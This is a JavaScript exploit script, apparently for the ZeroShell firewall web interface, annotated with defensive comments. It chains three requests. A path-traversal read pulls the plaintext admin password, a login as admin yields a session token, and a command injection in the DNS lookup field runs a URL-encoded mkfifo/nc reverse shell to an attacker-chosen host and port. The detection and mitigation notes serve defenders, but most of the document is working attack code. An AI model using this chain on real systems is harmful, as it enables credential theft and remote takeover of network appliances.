// Appends a <script> element to the document's first <head> so that jQuery is
// loaded into the current page; the $.ajax calls further down depend on it.
// NOTE(review): the library is pulled over plain http:// from a third-party
// host with no integrity attribute. A Content-Security-Policy whose script-src
// does not allow that host stops this load, and with it every request below.
var h=document.getElementsByTagName('head')[0];
var j=document.createElement('script');
j.src='http://code.jquery.com/jquery-latest.min.js';
h.appendChild(j);

var pwd="";
var token="";

var hash = window.location.hash.substring(1);
var lhost = hash.substring(hash.indexOf("lhost=")+6, hash.indexOf("&"));
var lport = hash.substring(hash.indexOf("lport=")+6, hash.length);

var payload='beef%22+localhost+%26%26+rm+-f+%2Ftmp%2Fx%3Bmkfifo+%2Ftmp%2Fx%3Bcat+%2Ftmp%2Fx%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+' + lhost + '+' + lport + '+%3E+%2Ftmp%2Fx+%23';

// Runs a chain of three nested requests once, 5 seconds after this script is
// evaluated (presumably to give the injected jQuery time to load; `$` must
// exist by then). Every URL is relative, so the requests go to the origin of
// the page the script runs in, which the author's comments identify as the
// ZeroShell web interface.
// Defensive summary of what the chain depends on:
//   1. a file outside the web root can be read without a session,
//   2. that file holds the admin password in a form usable for login,
//   3. the authenticated DNS lookup action accepts shell metacharacters.
// Removing any one of the three breaks the chain. Until the appliance runs a
// fixed release, keep the management interface reachable only from trusted
// networks, and change the admin password if request 1 appears in the logs.
setTimeout(function (){
	// Request 1: unauthenticated GET (Section=NoAuthREQ) whose Object parameter
	// uses "../" sequences to reach a file under /var/register; per the author,
	// the response is the console admin password in plaintext.
	// Detection: access-log entries for /cgi-bin/kerbynet where Object contains
	// "../" or names a path under /var/register.
	$.ajax({ 
		type: 'GET',
		url: "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw",
		contentType: 'application/x-www-form-urlencoded;charset=utf-8',
		success: function(result){
			// Surrounding whitespace is stripped; an empty response ends the chain here.
			pwd = result.trim();
			if(pwd != ""){
				// Request 2: logs in as "admin" with the password retrieved above.
				// The password is appended to the form body as-is (no URL-encoding).
				// Detection: an admin StartSessionSubmit that directly follows a
				// NoAuthREQ render request from the same client.
				$.ajax({ 
					type: 'POST',
					url: "/cgi-bin/kerbynet",
					contentType: 'application/x-www-form-urlencoded;charset=utf-8',
					dataType: 'text',
					data: 'Action=StartSessionSubmit&User=admin&PW='+pwd,
					success: function(result){
						// Takes the 40 characters that follow the first "STk=" in the
						// login response as the session token.
						token = result.substr(result.indexOf("STk=")+4, 40); 
						// Request 3: authenticated Action=Lookup / Section=DNS call that
						// carries `payload` in the What field; the author describes the
						// effect as spawning a reverse shell. No callback is registered,
						// so the response is ignored.
						// Mitigation on the server side: validate What as a host name or
						// address and never build a shell command line from it.
						$.ajax({ 
							type: 'POST',
							url: "/cgi-bin/kerbynet",
							contentType: 'application/x-www-form-urlencoded;charset=utf-8',
							dataType: 'text',
							data: 'Action=Lookup&STk='+token+'&Section=DNS&What='+payload+'&DNS=localhost'
						});
					}
				});
			}
		}
	});
}, 5000);
